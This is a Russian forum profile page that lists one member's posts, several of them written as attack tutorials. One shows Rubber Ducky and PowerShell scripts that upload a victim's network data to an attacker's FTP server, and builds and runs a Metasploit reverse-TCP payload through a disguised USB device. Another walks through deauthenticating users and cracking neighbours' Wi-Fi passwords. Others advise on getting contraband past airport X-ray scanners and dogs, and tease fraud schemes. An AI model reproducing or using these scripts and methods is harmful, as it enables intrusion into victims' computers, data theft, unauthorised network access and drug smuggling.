Перейти к публикации

Дядя Коля

Members
  • Публикации

    116
  • Зарегистрирован

  • Посещение

Все публикации пользователя Дядя Коля

  1. сделать и как можно его применить. Сразу скажу, что сюжетов существует много и достаточно посмотреть на количество возможных вариантов. Они есть как под разные операционные системы, так и под задачи. Рассмотрим как на практике работают некоторые из них и как их можно использовать. Советую прочитать прошлые части Как сделать USB ducky? USB Ducky + WiFi Ducky Нужно понимать, что такого ряда атаки проводятся, когда у вас есть возможность каким-то образом передать или доставить наше устройство для жертвы. Я писал, что можно заказать флешку и упаковать наше чудо в небольшой и приятный корпус, который не будет вызывать подозрений. Удаленное получение информации о сети с PowerShell Что нам нужно: USB WiFi Ducky (связка Arduino Micro Pro и Wemos mini d1); Удаленный сервер с установленным FTP-сервером; Мобильное устройство. Базой нашего скрипта будут команды, которые позволяют получить информацию о сети. Очень подробно они описаны здесь. В нашем примере используем Get-NetIPConfiguration, аналог всем известной командыipconfig в командной строке Windows. Если вам нужно доработать скрипт или заточить под свои нужды, то посмотрите информацию по ссылке выше. Загрузка данных о сети нашей цели будет осуществляться на удаленный FTP-сервер. Для примера был выбран Golden FTP Server. Его также можно использовать и на локальной машине. Вы понимаете, что для серьезных задач нам нужен выделенный FTP-сервер. FTP Server Нажимаем “Добавить” и указываем путь для доступа к файлам. Ставим галочку “Разрешить полный доступ”. Приступаем к скрипту: ############################################ Get-NetIPConfiguration > ipdata.txt; #указываем файл для записи данных о сети $Dir="ipdata.txt" #указываем директорию FTP-сервера $ftp = "ftp://<FTP>" #указываем адрес FTP-сервера (текст в скобочках заменяется на адрес сервера) $webclient = New-Object System.Net.WebClient foreach($item in (dir $Dir "*.trc")){"uploading";$uri = New-Object System.Uri($ftp+$item.Name);$webclient.UploadFile($uri, $item.FullName)} #код для записи файла на сервер. Цикл foreach записан в строку del ipdata.txt #удаляем исходный файл с данными о сети ############################################ Скрипт можно предварительно протестировать на работоспособность в PowerShell. Далее перепишем скрипт в виде команд Ducky Script: GUI r DELAY 100 STRING powershell ENTER DELAY 1000 STRING Get-NetIPConfiguration > ipdata.txt;$Dir="ipdata.txt";$ftp = "ftp://127.0.0.1/F/";$webclient = New-Object System.Net.WebClient; ENTER STRING foreach($item in (dir $Dir "*.trc")){"uploading";$uri = New-Object System.Uri($ftp STRING + STRING $item.Name);$webclient.UploadFile($uri, $item.FullName)} ENTER STRING del ipdata.txt ENTER DELAY 100 STRING exit ENTER Также стоит отметить, что на разных компьютерах стоит использовать разные значения DELAY, то есть задержки между выполнением команд. С этим нужно экспериментировать. В ходе использования скрипта файл с информацией о сети передается на ваш FTP-сервер и удаляется с компьютера жертвы. Пример отчета можно увидеть на скриншоте. Файл с нашими данными ipdata.txt: Информация о жертве ipdata.txt Meterpreter С помощью USB Rubber Ducky мы можем использовать не только написанные на Ducky сценарии, но и загружать исполняемые файлы, которые смогут действовать сами по себе. Именно эту возможность мы разберем. Итак, для атаки нам понадобится: Машина под управлением Linux с установленным Metasploit Framework и Apache (лучше использовать выделенный сервер); Arduino Micro Pro в связке с Wemos mini d1, с установленной прошивкой для эксплуатации Ducky-скриптов; Машина под управлением Windows с поддержкой Powershell; Мобильное устройство с поддержкой WiFI. Итак, начнем. Шаг 1. Создание payload Для начала узнаем IP-адрес нашей машины с помощью команды ifconfig. Как видим, наш адрес — 192.168.0.x Создадим исполняемый файл .exe с помощью команды: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.100 lport=5555 -f exe > / root/Desktop/reverse_tcp.exe После ввода команды получаем результат: После этого в папке root/Desktop создастся нужный файл. Шаг 2. Конфигурирование веб-сервера Запустим веб-сервер Apache 2 с помощью команды: service apache2 start Скопируем файл reverse_tcp.exe в директорию сервера: var/www/html Дальше проверяем работу сервера: введя свой IP в адресной строке браузера, увидим что-то похожее: Шаг 3. Работа с WiFi USB Ducky На данном этапе мы используем непосредственно нашу “уточку”. Для начала, взглянем на скрипт по ссылке. Желательно его отредактировать, убрав лишние пробелы и комментарии. После этого заменяем "service.jar" на название нашего payload, и IP-адрес на адрес нашего компьютера. Подключаем устройство, подключаемся к точке доступа “уточки” и загружаем полученный скрипт: Шаг 4. Атака Нажимаем на кнопку “Run Script”. На компьютере жертвы запускается окно “Выполнить”, затем вызов Powershell в фоновом режиме. После этого исполняемый файл с нашего сервера скачивается, запускается и закрывается процесс Powershell. Чтобы контролировать компьютер жертвы с управляющей машины, вводим команду msfconsole. После загрузки фреймворка выполняем такую последовательность команд: msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > set lport 5555 msf exploit(handler) > exploit Если payload на компьютере жертвы сработал, вы увидите такую картину: После установки подключения вы сможете использовать все возможности платформы. Заключение Вот такими способами можно применять уточку. Также я хочу сказать, что можно использовать технологию загрузки с сервиса для других задач. Конечно, для проведения хорошей атаки нужно поработать с нагрузкой. Так как она обнаруживается антивирусами и поэтому имеет далеко не стопроцентный шанс. Но с использованием навыков СИ, например отправить сообщение в критичный момент для цели, может отлично сработать.
  2. Способу уже недели две.Пользуемся, пока не пофиксили.
  3. Привет, Анон. В этой статье рассмотрим интересный кейс, как можно сделать USB ducky своими руками на базе Ardnuino Micro Pro. Стоимость такого устройства примерно 6 долларов. Это довольно интересная штука, которая имеет большой вектор атак, а также просто интересных вариаций. Давайте уже приступим к активным действиям. Ardnuino Micro Pro Установка Arduino IDE Для работы с устройствами Arduino необходимо установить приложение. Занимает не так много времени и места. Скачать можно по этой ссылке. Данный софт использовался на виртуальной машине с ОС Windows. После установки у вас будет примерно такой вид. Рабочий интерфейс Arduino IDE После этого подключается плата через USB. Дальше необходимо выбрать: "Плата Arduino Leonardo"->"Arduino Leonardo". Далее необходимо выбрать порт. Как правило, он определяется автоматически в моем случае это COM8 (Arduino Leonardo). Выбор порта После этого настройка окончена и можно приступать к поиску пейлоадов, которые мы будем запускать на нашей плате. Поиск и загрузка пейлоадов По этой ссылке есть очень много доступных пейлоадов. Можно выбрать в зависимости от ваших целей. Некоторые подходят только для Windows 7 или 10. Нужно внимательно читать описание. Пейлоады Например, мы хотим протестировать работоспособность первого и самого простого “Hello World”. Переходим в раздел, ищем наш код и копируем. Простой пейлоад Далее переходим на сайт и конвертируем наш код на сайте. После этого можно нажимать “Compile”. Заходим в Arduino IDE и вставляем наш код. Потом копируем наш код и компилируем. После подключения на компьютере открывается блокнот нотепад с надписью “Hello world”. Структура кода Компиляция кода Результат работы Давайте протестируем Payload — Windows 7/10: Logoff Prank. Аналогично копируем наш код, конвертируем и прошиваем плату. Далее запускаем и получаем учетную запись с необходимостью пройти авторизацию. Logoff prank После работы Дело в том, что есть очень много других пейлоадов, которые намного интересней и опасней. Также, есть очень большая проблема — языка раскладки. Если команда написана на английском, то скрипт не сработает у пользователя с российской раскладкой. Поэтому в следующей статье я покажу как усовершенствовать нашу схему и сделать так, чтоб ней можно было управлять в режиме реального времени. Таким образом, у нас будет возможность удаленного управления, что существенно повышает эффективность работы. Заключение В итоге USB ducky можно использовать для того чтобы пошутить с коллегами по работе или для получения доступа. Пейлоады предоставляют возможность работать как стиллер, грабить пароли от всех Wi-Fi сетей, а также создавать FTP сервер, загружать шелл через Netcat и другие возможности. Очень важный момент заключается в том, что устройство определяется как клавиатура и большинство команд происходят без какого либо внимания от антивирусов. Также данное устройство можно спрятать под флешку.
  4. Не оправданная схема и очень старая
  5. Дядя Коля

    Сроки по 228

    интервью довольно известного человека, который треть жизни отсидел в тюрьме из-за веществ
  6. Дядя Коля

    США vs. Tor

    Несмотря на то, что сеть Tor была первоначально создана правительством США, становится все более очевидно, что деятельность в даркнете и интересы федерального правительства расходятся в разные стороны.
  7. Дядя Коля

    Интервью

    Мотивы и жизнь человека, зарабатывающего грязные денежки.
  8. Дядя Коля

    Виды аппаратных кошельков

    лучше пользоваться проверенными способами, чем доверять свои средства третей стороне.
  9. Криптовалюты — очень молодой рынок. Самой первой из них, биткоину (Bitcoin), в январе исполнилось всего девять лет. Но давайте немного пофантазируем и представим, каким может оказаться криптовалютное будущее. Вот пять основных сценариев. 1. Будущее криптомаксимализма Ситуация: Биткоин — глобальная валюта. Им расплачиваются везде и всюду, за исключением ситуаций с покупкой наркотиков в даркнете и уходом от налогов, — там используется Zcash, который, конечно, запрещен, но эти запреты обходятся. Все розничные транзакции проходят через Lightning-хабы, которые постоянно отслеживаются и проверяются искусственным интеллектом. Люди берегут свои личные ключи, потому что, утратив их, можно лишиться всех сбережений. Теми же ключами зашифрованы их личные данные, которые могут использоваться децентрализованными приложениями, выполняемыми на «всемирном Ethereum-компьютере». Эта машина (благодаря системе Plasma) выполняет миллиарды операций за миллисекунду. И, опять же, на страже стоит искусственный интеллект, который который отслеживает признаки мошенничества. Фиатные валюты умерли от гиперинфляции, банки умерли вместе с ними, национальные государства дышат на ладан, — новое поколение предпочитает любому гражданству его полное отсутствие. Мир контролируется в основном объединениями биткоин-систейдер-либертарианцев (систейдинг — это движение, предполагающее создание независимых сообществ, плавающих в открытом море, вне какой-либо государственной юрисдикции) и хакерских Ethereum-коммун, которые называют себя «филами», как в «Алмазном веке» Нила Стивенсона, — только теперь это будет «Век крипты». Вероятность такого сценария: Практически нулевая по многим причинам. Подавляющее большинство людей не хотят хранить секретные ключи, а если этого не делать, то криптовалюта мало чем отличается от счета в банке, а если чем-то и отличается (например, неотменяемостью сделки), то не в лучшую сторону. Кредит и криптовалюты плохо совместимы. Большинство людей хотят, чтобы их правительство было сильным, а сильное правительство хочет контролировать свою валюту, а это значит, что большинству людей нравится фиат. Потому что дефляция — это на самом деле плохо. И так далее. 2. Будущее крипто-Уолл-стрит Ситуация: Обычные люди не пользуются криптовалютами, зато в финансовом мире все на них завязано. Все акции и облигации записаны в Ethereum-блокчейне, и любой обладатель специального токена, подтверждающего личность и статус инвестора, может торговать любыми акциями и облигациями на любом рынке любой страны мира почти в реальном времени, не спрашивая ни у кого разрешения. Торговля в основном происходит через полностью децентрализованные биржи, хотя на некоторых рынках централизованные еще удерживают позиции. Впрочем, мало кто торгует самостоятельно, — у большинства есть торговые помощники с искусственным интеллектом. Биткоин — глобальная расчетная и резервная валюта; золото больше никого не интересует. Вы можете заплатить долларовой карточкой, но сумма будет сразу переведена в биткоины, нужное количество сатоши в рамках той же транзакции будет отправлено эмитенту карты и банку-посреднику, после чего остаток будет конвертирован обратно и отправлен продавцу товара. Благодаря системе Lightning плата за эту операцию настолько мала, а выигрыш на объемах так велик, что это дешевле других вариантов. Обычные люди так и не узнали, что такое Lightning, но платежные каналы между банками, как внутри стран, так и международные, пропускают через себя сотни миллионов долларов в день. Вероятность такого сценария: Практически нулевая. Безотзывность криптовалютных транзакций и неудобство предоставления кредитов в криптовалюте — это достаточные причины. Возможно, мы ошибаемся. Тем не менее, здесь мы видим применение хотя бы некоторых преимуществ криптовалюты — зачем поддерживать тысячи и тысячи независимых баз данных, если можно обойтись... скажем, одной. 3. Будущее Dapps (децентрализованных приложений) Ситуация: В финансах криптовалюты не особенно прижились — это просто один из классов активов и контркультурный феномен. Зато токенизированные протоколы, используемые децентрализованными приложениями, завоевали интернет. Facebook, Twitter, а постепенно и Google заменяются огромными одноранговыми сетями, в которых вычисления и данные координируются и оптимизируются в реальном времени с помощью токенов, управляемых искусственным интеллектом. Правила этих систем определяются частыми голосованиями, также токенизированными. Личные данные пользователей упакованы в «контейнеры», разбросанные по интернету и защищенные личным ключом, и их можно делать частично доступными тем или иным сервисам, но кому и когда — это решаете лично вы или ваши доверенные лица. Когда вы даете доступ к своим личным данным, вы получаете вознаграждение, которое затем можно на что-нибудь потратить. У каждого человека портфель с сотнями или тысячами разных токенов, и искусственный интеллект ими все время торгует, оптимизируя этот портфель под ваш образ жизни. Подобные токенизированные структуры начинают образовываться и в офлайне — в разработке оборудования, в проектировании городов, в деятельности масштабных художественных коллективов. Экономика токенов все больше регулирует человеческое поведение. Вероятность такого сценария: Не слишком высокая. Да, картинка по-своему вдохновляющая, но большинству людей нужны централизованные решения, которые дают им возможность куда-нибудь пожаловаться. Они хотят иметь возможность самим вводить правила и обеспечивать их выполнение без голосования по каждому чиху в каждой сети, к которой они подключены. (Жители Калифорнии с их референдумами могут представить себе, что такое отвечать на подобные вопросы каждый день.) Распределенные приложения по своей природе более сложные, хрупкие и медленные в развитии по сравнению с их централизованными аналогами. (Представьте, что для любого изменения функциональности вам нужно провести разделение блокчейна, то есть делать хардфорк.) Вознаграждения децентрализованным пользователям очень невелики — в случае в Facebook это могут быть $10 в квартал на пользователя, что не окупает все хлопоты с децентрализацией. Централизованные решения имеют целый ряд преимуществ: они выигрывают за счет экономии на масштабе, специализированные центры обработки данных эффективнее персональных компьютеров, а базы данных намного быстрее любого блокчейна. И никто не хочет отслеживать портфель из сотен различных видов токенов, даже с помощью интеллектуального помощника. 4. Будущее глобального криптоюга Ситуация: Северная Америка и Европа по-прежнему используют доллары и евро, а на Уолл-стрит по-прежнему в ходу собственные системы, хотя криптоактивами там тоже торгуют. Facebook по-прежнему остается главной социальной сетью золотого миллиарда. Криптовалюты существуют где-то на втором плане, это игрушка, в лучшем случае дополнительный инвестиционный инструмент. А вот на юге ситуация совсем иная: Венесуэла и Зимбабве первыми заменили свои деньги криптовалютами — для защиты от гиперинфляции. (Речь идет о настоящей криптовалюте, а не об этом недавнем венесуэльском недоразумении вроде Petro.) Это оказалось естественным шагом после мобильных платежных систем вроде M-Pesa или Orange Money. Сначала было непросто, например, успешная атака на протокол BGP вывела из строя большинство эфиопских майнеров и позволила провести атаку 51%, сделав нескольких хакеров очень богатыми за счет казначейства Аддис-Абебы, но после нескольких хардфорков и выпуска версии 2.0 ситуация стабилизировалась. Следом на блокчейн перешли местные рынки акций и облигаций. То же случилось и с местным интернетом, где пересылка данных обходилась гораздо дороже, чем в США. Это, наряду с относительно большим потенциальным вознаграждением за использование распределенных приложений, привело к их расцвету. Используются в основном национальные криптовалюты (которые можно обменивать в режиме реального времени на большой децентрализованной бирже с межвалютными платежными каналами, работающими по алгоритму Atomic), которые почти заменили местные централизованные западные финансовые сервисы. Теперь, когда зимбабвийцы посещают Лондон или Нью-Йорк, они удивляются отсталости финансовой сферы. Вероятность такого сценария: Как ни странно, все это звучит довольно правдоподобно. Не слишком вероятно, но вполне возможно. Жителям Нью-Йорка, Лондона, Торонто или Парижа проще пользоваться международными кредитками: комиссий по ним нет, зато есть бонусные мили и баллы, акции и кэшбэк, расширенная страховка и другие бонусы. Теперь представьте, что вам предлагают променять это на «международную криптовалюту» и «Lightning-каналы». И совсем иная ситуация у жителей Африки. Когда вас считают подозрительным и не дают кредит лишь потому, что вы живете в густонаселенной африканской стране, когда у вас двузначная, а порой и трехзначная инфляция... вот тогда уравнение выглядит несколько иначе. 5. Будущее криптоконтркультуры Ситуация: Биткоин, эфир, Tezos и EOS не захватили мир, — люди по-прежнему пользуются долларами, евро, реалами и юанями. В финансовом мире отдельные частные закрытые блокчейны нашли себе применение, но это не обещанная всемирная революция, а отдельные участки, где эта технология оказалась эффективнее. Впрочем, это касается 98% населения планеты. Для оставшихся 2% все иначе. Это не доверяющие правительству либертарианцы, увлеченные технологией хакеры, а также идеалисты, которые верят, что криптовалюты могут изменить мир к лучшему. Они готовы возиться с закрытыми ключами, финансировать платежные каналы, приобретать жетоны, устанавливать и оплачивать распределенные приложения и распределенно хранить свои данные, но их всего 2%, то есть 140 млн человек во всем мире. Итак, неподцензурные, независимые, децентрализованные социальные сети использует всего 140 млн человек, но это немало, и это значит, что и в централизованных системах цензура не очень эффективна, поскольку всегда есть децентрализованная альтернатива. Всего 140 млн человек используют криптовалюту в быту и для сбережений, но это достаточно много, чтобы ограничивать национальные валюты, поскольку центробанки понимают, что жизнеспособная альтернатива есть, и, если централизованными деньгами станет неудобно пользоваться, люди могут на нее переключиться. Всего 140 млн человек используют системы с открытым доступом, — и этого достаточно, что, если вас по какой-то причине заблокировали в централизованной системе, у вас была альтернатива, и вы не оказались полностью исключены из социума. В общем, криптовалютами пользуются всего 2%, но они оказывают огромную услугу остальным 98%, удерживая правительства от цензуры, а банки — от проявлений излишней жадности. Наличие жизнеспособной децентрализованной альтернативы оказывается фактором, во многом смягчающим недостатки централизованных систем. Вероятность такого сценария: Весьма вероятно, что именно так все и будет.
  10. Черная, но довольно профитная схема. Тема связана с операторами сотовой связи, заставлять людей пополнять ваши счета.
  11. Будет очень грустно, если вас выследят не по горячим следам, не сдадут доверенные лица и т.д., а поймают тупо из-за вашей лени и пренебрежения какими-то простыми советами.
  12. Дядя Коля

    Взлом Wifi

    Мы воспользуемся инструментом Aircrack-ng. Я буду это делать через Kali Linux, где он предустановлен. Открываем терминал и переводим нашу вай-фай карточку в режим мониторинга вот такой командой: sudo airmon-ng start wlan0mon После этого (изменения режима с приема на мониторинг) мы сможем видеть весь проходящий вокруг нас трафик, для этого вводим команду airodump-ng: sudo airodump-ng wlan0mon Мы видим такую картину. Точки доступа здесь сверху, а пользователи снизу: Дальше займемся непосредственно перехватом хендшейка) Выбираем нужную нам точку доступа и запускаем airodump-ng непосредственно на неё следующей командой: sudo airodump-ng -c 1 --bssid 00:11:22:33:44:55 -write /root/Desktop/hack wlan0mon Настройки: -c Канал беспроводной сети --bssid MAC адрес точки доступа --write Файл в который будет записано рукопожатие wlan0mon Сетевой интерфейс Теперь ускорим процесс перехвата хендшейка путем того, что отключим пользователя от точки, чтобы он еще раз прошел авторизацию. Можно этот шаг пропустить, если вы не хотите этого делать (палевно чутка, но зато быстро). Деаутентифицируем всех пользователей точки: sudo aireplay-ng --deauth 5 -a 00:11:22:33:44:55 wlan0mon --deauth 5 Сколько deauth сообщений отправить (0 — без ограничений) -a MAC адрес точки доступа Wlan0mon Сетевой интерфейс После этого клиент еще раз подключится к сети и мы перехватим хендшейк. Дальше необходимо расшифровать пароль из перехваченного рукопожатия методом перебора по словарю. Словари можно найти в интернете) http://wordbook.xyz/download/ вот хороший сайт с разными словарями. Выполняем такую команду: aircrack-ng -w wordlist.dic -b 00:11:22:33:44:55 hack.cap Настройки: -w Путь к словарю с паролями -b MAC адрес точки доступа hack.cap файл с нашим перехваченным рукопожатием И ждем) В случае успеха нас ждет подобное сообщение: Простых вам соседских паролей, друзья))
  13. Ни для кого не секрет, что рабство никуда не исчезало, оно лишь стало более завуалированным.
  14. 1) Рентген-аппарат. Просвечивают багаж, который вы ставите на ленту. Оператор перед экраном видит картинку в цветах, отображающих плотность предметов. Значит это, что оператор может увидеть более плотное в менее плотном — например, нож внутри пластикового корпуса ноутбука. Или свёрток с веществами, зашитый в пуховик. Как обойти рентген? Благодаря различной "пропускной способности" различных материалов на мониторах, а их два, программа делит все на органику и не органику. Органика вся просвечивается напрочь. А вот неорганика, как металлы (толстостенные) просвечивается плохо, особенно свинец. То есть, если вы повезете затворную рамку от ПМ между двух ступиц ВАЗ 2108 есть шанс провезти. Ах да, мед не просвечивается практически совсем! Но на счет меда инструкция - ПРОТЫКАТЬ. Совет. 2) Вас могут ощупать и попросить выложить всё из карманов. В багаже могут рыться в поисках интересных им предметиков, вроде сигарет, оружия, лекарств. Людей с теми же целями только ощупывают, и если что-то показалось — могут увести и проверить глубже, ага. Поводом может стать то, что вы как ебланы нервничаете, очень заинтересованно разглядываете процесс проверок, выглядите не как все, неопрятны, пьяны, вы не европеоидной расы. Как обойти обыск? Не ссать и не подавать виду, тем более не везти ничего в одежде или в своем организме. 3) Собаки, сканеры и газоанализаторы. Сканеры установлены практически во всех аэропортах мира, на наземных границах они встречаются намного реже. Ищут спрятанные предметы. Производители заявляют, что сканер способен обнаружить наклеенный на тело лист бумаги, а ложные срабатывания бывают на пот подмышками, как на гелеобразную взрывчатку. Портативные газоанализаторы чуют следовые (очень маленькие) количества веществ в воздухе. Как обойти собак и газоанализаторы? Усложнить работу можно: упаковывать стафф в несколько слоёв майлара, в одноразовых перчатках, после каждого слоя переходя в другое помещение, меняя перчатки и протирая всё растворителем. Да, уж, не просто. Вывод: если службы стараются, а вы не знаете досконально принципов их работы, шансы на успех невысокие. Если не стараются, то шансы пронести небольшой вес должны быть около 99%, если думать головой. Успешных примеров — множество. Но не считаю обоснованным рисковать с шансом 1/1000 (да хоть 1 на 100 тысяч) ради небольшого веса.
  15. Известные сервисы , но проверка на розыск слабо работает
  16. «Никому не сообщайте этот код!» — казалось бы, когда речь идет об одноразовых кодах и паролях, это настолько очевидный совет, что его нет смысла в очередной раз повторять. Однако обстоятельства бывают разные…
  17. Очень конструкнивный комментарий
  18. Слишком черная схема
  19. У многих возникает вопрос какой адаптер купить. И вопрос этот действительно имеет место быть. Во-первых, адаптер должен поддерживать такие функции как: 1. Режим монитора 2. Захват хендшека 3. Инъекция пакетов Во-вторых, учитывая, что для киберхулиганства используется операционные системы семейства linux адаптер нужен такой, для которого есть драйверы. И это реально проблема - правда я это понял, когда запорол ядро на винте и двух флешках, пытаясь собрать драйвера из исходников и запихать в ядро модуль для TP-LINK Archer AC600. В теории драйвера вроде как есть, но на практике хер их поставишь. На полках магазинов их можно уже не искать. Все они "вне закона". Так что вариантов всего два - либо заказ либо покупка с рук. Первый вариант меня всегда напрягал. Во-первых долго, во-вторых велики риски купить "кота в мешке", т.к. адаптеры бывают разных версий или ревизий и тот же TP-LINK TL-WN722N сейчас есть везде, но он v2.0 которая даром не нужна. Тем не менее я заказывал AWUS036NH которая вполне себе оригинальная была - и сломал ее по своей неосторожности. Так что заказ это не на 100% попадалово. Но все же возможность перед покупкой протестировать адаптер (прихватив с собой на рандеву с барыгой ноутбук) - ничто не заменит. Чипсеты. Сердце адаптера, так называемый чипсет - основкой критерий выбора. Драйверы идут именно под чипсет, и если под него нет их - то все остальное вторично. С линуксом отлично работают адаптеры на чипсетах: 1. Ralink RT2870/RT3070 2. Atheros AR9271 На сайте "петуха" есть и другие чипсеты, но я не тестировал их так что ручаться и рекомендовать не стану. Эти работают 100%. На атеросах известные адаптеры это TP-LINK TL-WN722N v1.0 и ALFA Network AWUS036NHA. На ралинке самая известная "пушка" - ALFA Network AWUS036NH. Она же является и самой мощной на этой планете - выдает 2000 mW (при TX PWR 30 - в стоке у нее стандартная TX PWR 20 и как следствие 1000 mW, если я не ошибаюсь). На заметку - TX PWR поднять очень просто. Сначала выполняем команду: Код: iw list В дампе находим список каналов и стоковую мощность адаптера: Frequencies: * 2412 MHz [1] (20.0 dBm) * 2417 MHz [2] (20.0 dBm) * 2422 MHz [3] (20.0 dBm) * 2427 MHz [4] (20.0 dBm) * 2432 MHz [5] (20.0 dBm) * 2437 MHz [6] (20.0 dBm) * 2442 MHz [7] (20.0 dBm) * 2447 MHz [8] (20.0 dBm) * 2452 MHz [9] (20.0 dBm) * 2457 MHz [10] (20.0 dBm) * 2462 MHz [11] (20.0 dBm) * 2467 MHz [12] (20.0 dBm) (no IR) * 2472 MHz [13] (20.0 dBm) * 2484 MHz [14] (20.0 dBm) (no IR) после чего выполняем: Код: sudo iw reg set US Речекаем список каналов и сикаем в портки от радостей: Frequencies: * 2412 MHz [1] (30.0 dBm) * 2417 MHz [2] (30.0 dBm) * 2422 MHz [3] (30.0 dBm) * 2427 MHz [4] (30.0 dBm) * 2432 MHz [5] (30.0 dBm) * 2437 MHz [6] (30.0 dBm) * 2442 MHz [7] (30.0 dBm) * 2447 MHz [8] (30.0 dBm) * 2452 MHz [9] (30.0 dBm) * 2457 MHz [10] (30.0 dBm) * 2462 MHz [11] (30.0 dBm) * 2467 MHz [12] (disabled) * 2472 MHz [13] (disabled) * 2484 MHz [14] (disabled) Помимо альф и тп-линков бывают и другие адаптеры, но инфы по ним мало. Да и производитель как правило не указывает чипсет. Ни на упаковке, ни на сайте, ни на наклейках. А разобрать адаптер не позволит продавец. Лично я решаю проблему поиска следующим образом. Сначала я смотрю всё, что есть в наличии в обычных или интернет магазинах с самовывозом, а так же на всяких авитах. Выискиваю там в первую очередь адаптеры с внешней антенной, т.к. ковырять адаптер, припаивая к монтажным площадкам провода от крепления антенны - риски его повредить перегревом или механически. Современные печатные платы многослойны и все штампуются дроидами, скилл в пайке у которых овер 9000. Я же пайщик 3 лвл, так что нафиг. Найдя большой адаптер с антенной я копирую его название или информацию из объявления в поисковик сайта викидеви - https://wikidevi.com/wiki/Main_Page и ищу там информацию о чипсете: Таким макаром я третьего дня урвал вполне себе пушку на ралинке 3070, так и не поняв собственно как этот адаптер называется. Причем история получилась крайне занятная. С адаптером в комплекте шел минидиск. а там на тине кор линуксе запилен aircrack-ng. Ко всем этим чудесам прилагался буклетик с десятком скриншотов и двумя десятками слов - о том как взамывать вифи. Сопоставив эти факты, возраст продавца и цену за которую он его продавал я маленько поиграл в Шерлока и вот что решил: 1. Мужику за 50 кто то сказал что есть адаптеры взламывающие вифи. 2. Он заказал ИЗ КИТАЯ этот адаптер расчитывая получить автоматическую пушку, которой нужно лишь сказать ФАС! и она все сделает красиво. 3. Промудохавшись с ним и нихера не распетляв он сделал вывод что его наебали ввели в заблуждение и решил спихнуть его другому лоху. Только вот вместо лоха приехал я, на его изумленных глазах я перевел адаптер в режим монитора и по шурику чекнул точки вокруг - как и ожидалось список не влезал в экран, а счетчики маячков крутились с бешенной скоростью - мощнейщие ралинки сразу просекаешь по качеству синала в первой десятке списка. Ну а когда он услышал что тот адаптер мог продать не за 700р, а за 2000р - то и вовсе приуныл. Но за язык его никто не тянул и я благопалучно ретировался, пока он не передумал. В общем подводя итоги уверенно напишу - авито и прочие это золотое дно. Кроме этого китайца я видел и 722й первой версии но к сожалению не успел. За 350 рублей он улетел за полчаса я думаю. Немного пикчей китайца: ↑ сверху стоковое дуло, на адаптере длинноствольная восьмерка ↑ низ печатной платы ↑ самая большая микросхема и есть чипсет - НЕ ЛАПАЙТЕ ЕГО РУКАМИ! особенно зимой - чувствительны к статике.
  20. Недавно в соцсети «ВКонтакте» появилась новая настройка – «Кто может найти меня при импорте контактов по номеру». Вроде бы благое начинание: хочешь, чтобы тебя нельзя было найти, – настрой, не найдут. Вот только по умолчанию искать вас позволено вообще всем пользователям, а раньше даже и выбора не было! Сама «ВКонтакте» особо о появлении новой настройки не распространяется, так что многие пользователи не в курсе и используют настройки по умолчанию. А надо бы поменять. Откуда все это взялось Начнем с того, что с какого-то момента при регистрации в крупнейшей российской соцсети стало обязательно указывать номер телефона, а тех, кто зарегистрировался ранее, настоятельно просили привязать свой аккаунт к номеру. Ввести произвольный номер не получится, поскольку соцсеть требует код подтверждения из смс. Думаю, так «ВКонтакте» борется с огромным количеством фейковых страниц и ботов, хотя официально пользователю это подается под соусом заботы о безопасности страницы. К тому же говорится, что телефон нигде не показывается и используется только для входа на сайт. Однако на самом деле это не совсем так. Проблема вот в чем: во «ВКонтакте» есть опция – найти друзей. Например, это можно сделать, поделившись адресной книгой почтового аккаунта или импортировав адресную книгу своего телефона. Социальная сеть найдет аккаунты владельцев этих номеров телефонов и предложит добавить их в друзья. При этом не важно, указан номер телефона у найденных людей в публичной информации или нет, – в список потенциальных друзей они все равно попадут. Все потому, что параметр «Кто может найти меня при импорте контактов по номеру» по умолчанию имеет значение «Все пользователи», и мало кто догадывается эту настройку изменить. Ну и что тут плохого? Функция поиска друзей, конечно, удобная. Но ... Во-первых, как-то нехорошо получается: «ВКонтакте» заявляет, что номер телефона, который вы указывали при регистрации, используется только для входа на сайт, а на самом деле нет. Во-вторых, что если искать вас по номеру телефона будут не настоящие друзья, а, скажем, спамеры? При помощи «ВКонтакте» они смогут связать номер с владельцем – узнать его имя, семейное положение, лучших друзей, место учебы, работы, увлечения, год рождения и так далее. И телефонные спам-звонки заиграют новыми красками – теперь эти люди будут обращаться к вам по имени, знать ваши интересы и как зовут вашу собаку. И пускай даже так у них не получится продать вам пылесос, но все равно неприятно, да? Вряд ли вы собирались делиться всей этой информацией со случайными людьми. Существенные угрозы А если воспользоваться этой функцией решат не спамеры, а мошенники? О телефонном мошенничестве мы писали уже множество раз. Обладая даже небольшим количеством информации о потенциальной жертве, мошенники увеличивают свои шансы в разы. Например, они могут: Звонить от имени банка, используя вашу персональную информацию, обращаться к вам по имени и просить сообщить данные карты или другую персональную информацию, пугая, например, блокировкой счета. Писать в мессенджерах от имени друзей и выманивать деньги/рассылать вредоносные программы. Или, что еще хуже, писать вашим друзьям от вашего имени. Звонить от имени компании, в которой вы работаете, вытягивать информацию или просить совершить какие-либо действия. Звонить от имени родственников и просить о помощи/переводе денег – и так далее. Что с этим делать? Правильно настройте приватность «Вконтакте», чтобы посторонние не видели о вас слишком много информации. Установите настройку «Кто может найти меня при импорте контактов по номеру» в более приватное положение – например, «друзья или друзья друзей» либо «никто».
  21. Про слив с пуш-уведомлений сейчас говорят очень много. Оно и ясно. Ведь это очень дешёвый и качественный трафик, при наличии базы подписчиков. Я сам зарабатываю на пуш-рассылках по своей базе, но что делать тем, у кого этой базы нет? В данной статье я расскажу как получать огромное кол-во очень дешёвого трафика с пуш рассылок даже не имея собственной базы.
×
×
  • Создать...